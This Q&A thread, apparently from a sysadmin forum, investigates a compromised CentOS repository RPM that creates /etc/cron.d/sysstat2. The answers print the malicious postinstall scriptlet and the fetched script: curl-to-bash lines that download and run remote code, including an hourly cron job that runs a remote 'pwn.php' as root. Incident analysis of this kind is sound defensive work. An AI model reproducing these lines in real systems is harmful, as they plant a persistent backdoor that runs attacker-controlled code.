How did installing this RPM create a file?


Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:



# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package


How did the RPM create the file and how do I see what else it did?










Tags: centos7, yum, rpm






asked 8 hours ago by Pascal

  • So, are these GetPageSpeed folks owned and they don't know it, or are they publishing bad RPMs themselves?
    – Aaron Copley, 6 hours ago

  • The RPM I installed from their site three months ago was good. The malicious one was posted yesterday. I think they were owned, and anyone using their repo is getting owned. The malicious one is coming down via yum update. I sent them an email and a message via their Contact Us form.
    – Pascal, 6 hours ago

  • And it's signed by them, too?
    – Aaron Copley, 6 hours ago

  • I don't know how to find that out.
    – Pascal, 6 hours ago

  • https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-7-6.el7.gps.noarch.rpm is the original file, it still has an old date in their repo, and gpgcheck=1 is set in it.
    – Pascal, 6 hours ago












2 Answers
# rpm -qp --scripts getpagespeed-extras-release-7-1.el7.gps.noarch.rpm
warning: getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: Header V4 RSA/SHA1 Signature, key ID 222b0e83: NOKEY
postinstall scriptlet (using /bin/sh):
curl -s -m 3 https://www.getpagespeed.com/SCM/release-post-install.php 2>/dev/null | bash >/dev/null 2>&1


https://www.getpagespeed.com/SCM/release-post-install.php contains:



#!/bin/bash
### hacked by rpowned
# bash <(curl -s https://www.some-other.com/load-it.sh) >/dev/null 2>&1
echo '53 * * * * root curl -s https://www.sayitwithagift.com/pwn.php 2>/dev/null | bash >/dev/null 2>&1' >> /etc/cron.d/sysstat2





answered 6 hours ago by Pascal

You discovered the rpm's scripts run a script from the Internet, and that script currently redirects to what might be malware. Although, I'm not finding much of a payload that does anything.

rpm cannot completely track what happened because it is running an arbitrary script.

gpgcheck will not help you, both the getpagespeed-extras-7-6.el7.gps.noarch.rpm and getpagespeed-extras-release-7-1.el7.gps.noarch.rpm you linked appear to have valid signatures:

$ gpg --keyid-format long /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
pub 2048R/0CD60276222B0E83 2017-03-03 GetPageSpeed Builder <info@getpagespeed.com>
sub 2048R/059A9010F4F3567D 2017-03-03
$ rpm -K getpagespeed-extras-*
getpagespeed-extras-7-6.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK
getpagespeed-extras-release-7-1.el7.gps.noarch.rpm: rsa sha1 (md5) pgp md5 OK

Complain to the repo owner that the package runs arbitrary code from the Internet. If it must do so, their software supply chain security needs improving.

It seems a bit paranoid to do the first install of software without Internet access, or manually inspect the "post install" script. But unfortunately it almost seems necessary if packages do ill-advised tricks like this.







answered 4 hours ago by John Mahowald

  • The payload is a cron job that downloads and runs 'sayitwithagift.com/pwn.php' every hour. Currently nothing there, but that could change at any time. Removing the RPM does not remove the payload.
    – Pascal, 4 hours ago

  • Their original RPM did not have a postinstall scriptlet. Only the version uploaded yesterday (presumably by a hacker) does.
    – Pascal, 3 hours ago
















